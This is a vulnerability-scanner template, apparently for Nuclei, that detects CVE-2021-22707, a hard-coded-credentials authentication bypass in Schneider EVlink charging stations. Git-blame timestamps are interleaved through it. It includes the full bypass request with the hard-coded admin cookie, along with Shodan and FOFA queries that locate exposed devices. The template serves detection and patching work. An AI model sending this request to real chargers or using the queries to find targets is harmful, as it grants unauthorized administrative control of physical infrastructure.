2023-08-10 06:30:57 +00:00
id : CVE-2021-22707
info :
name : EVlink City < R8 V3.4.0.1 - Authentication Bypass
author : ritikchaddha,dorkerdevil
severity : critical
description : |
A CWE-798 : Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges.
2023-09-06 12:09:01 +00:00
remediation : |
Upgrade to EVlink City R8 V3.4.0.1 or later to fix the authentication bypass vulnerability.
2023-08-10 06:30:57 +00:00
reference :
- https://codeberg.org/AmenoCat/CVE-2021-22707-PoC/raw/branch/main/exploit.sh
- https://nvd.nist.gov/vuln/detail/CVE-2021-22707
2023-08-31 11:46:18 +00:00
- http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-06
2023-08-10 06:30:57 +00:00
classification :
2023-08-31 11:46:18 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2023-08-10 06:30:57 +00:00
cve-id : CVE-2021-22707
2023-08-31 11:46:18 +00:00
cwe-id : CWE-798
epss-score : 0.3812
2023-10-26 18:00:24 +00:00
epss-percentile : 0.96778
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:o:schneider-electric:evlink_city_evc1s22p4_firmware:*:*:*:*:*:*:*:*
2023-08-10 06:30:57 +00:00
metadata :
verified : true
2023-09-06 12:09:01 +00:00
max-request : 1
2023-08-31 11:46:18 +00:00
vendor : schneider-electric
product : evlink_city_evc1s22p4_firmware
2023-09-06 12:09:01 +00:00
shodan-query : title:"EVSE web interface"
fofa-query : title="EVSE web interface"
2023-08-10 06:30:57 +00:00
tags : cve,cve2021,evlink,auth-bypass
http :
- raw :
- |
GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
Cookie : CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin
host-redirects : true
max-redirects : 2
cookie-reuse : true
2023-08-31 11:46:18 +00:00
2023-08-10 06:30:57 +00:00
matchers-condition : and
matchers :
- type : word
words :
- '?worker=Cluster" name="cluster" id="id_cluster'
- type : status
status :
- 200
2023-10-27 08:59:57 +00:00
# digest: 4a0a004730450220443b3f7a74a6268fbe5f35ed3e051d128455f74899ffe94436840b741b2003d7022100e1c89b91b80fe212a6e4294aa5812f63523041446f896c0c7ec27f02241abd97:922c64590222798bb761d5b6d8e72950